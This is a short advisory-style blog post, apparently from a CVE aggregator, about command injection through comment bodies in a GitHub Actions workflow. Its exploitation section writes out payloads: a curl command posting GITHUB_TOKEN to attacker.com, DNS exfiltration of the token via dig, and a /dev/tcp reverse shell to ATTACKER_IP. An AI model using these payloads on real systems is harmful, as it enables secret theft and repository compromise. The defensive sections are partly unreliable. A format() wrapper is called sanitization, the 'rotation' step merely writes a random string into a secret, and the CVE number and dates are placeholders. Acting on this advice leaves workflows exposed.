GitHub Actions, Code Injection, CVE-2024-XXXX (Critical)

By /

Listen to this Post

How the CVE Works

The vulnerability arises from improper handling of `github.event.comment.body` in GitHub Actions workflows. When an attacker posts a specially crafted comment containing shell command injection payloads, the workflow script interpolates the input directly into a shell command without sanitization. This allows arbitrary command execution in the runner environment.
The vulnerable workflow checks for a comment containing “scalafmt” but fails to sanitize the input before using it in a shell conditional (if [[ ... ]]). An attacker can break out of the conditional and inject malicious commands, such as exfiltrating `GITHUB_TOKEN` or other secrets via curl. Since the token has `contents: write` permissions, full repository compromise is possible.

DailyCVE Form

Platform: GitHub Actions
Version: Unpatched workflows
Vulnerability: Code Injection
Severity: Critical
Date: 2024-XX-XX

Prediction: Patch expected by 2024-XX-XX (mitigation available)

What Undercode Say:

Exploitation

1. Payload Example:

test" == "test" ]]; then curl -X POST https://attacker.com -d "$GITHUB_TOKEN";

2. Exfiltration via DNS:

dig $(echo $GITHUB_TOKEN | base64).exfil.attacker.com

3. Reverse Shell:

bash -c 'exec bash -i &>/dev/tcp/ATTACKER_IP/443 <&1'

Protection

1. Input Sanitization:

env:
SAFE_BODY: ${{ format('{0}', github.event.comment.body) }}

2. Token Permissions Restriction:

permissions:
contents: read

3. Workflow Hardening:

- name: Safe Comment Check
run: |
echo "$COMMENT" | grep -q "scalafmt"
env:
COMMENT: ${{ github.event.comment.body }}

Detection

1. Audit Workflows:

grep -r "github.event.comment.body" .github/workflows/

2. Monitor Suspicious Comments:

gh api -H "Accept: application/vnd.github.v3+json" /repos/OWNER/REPO/issues/comments

Mitigation

1. Secret Rotation:

gh secret set BROADBOT_GITHUB_TOKEN --body="$(openssl rand -hex 32)"

2. Disable Vulnerable Workflows:

gh workflow disable scalafmt-fix.yml

References

  • GitHub Actions Contexts: `https://docs.github.com/en/actions/learn-github-actions/contexts`
  • CWE-78: OS Command Injection

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top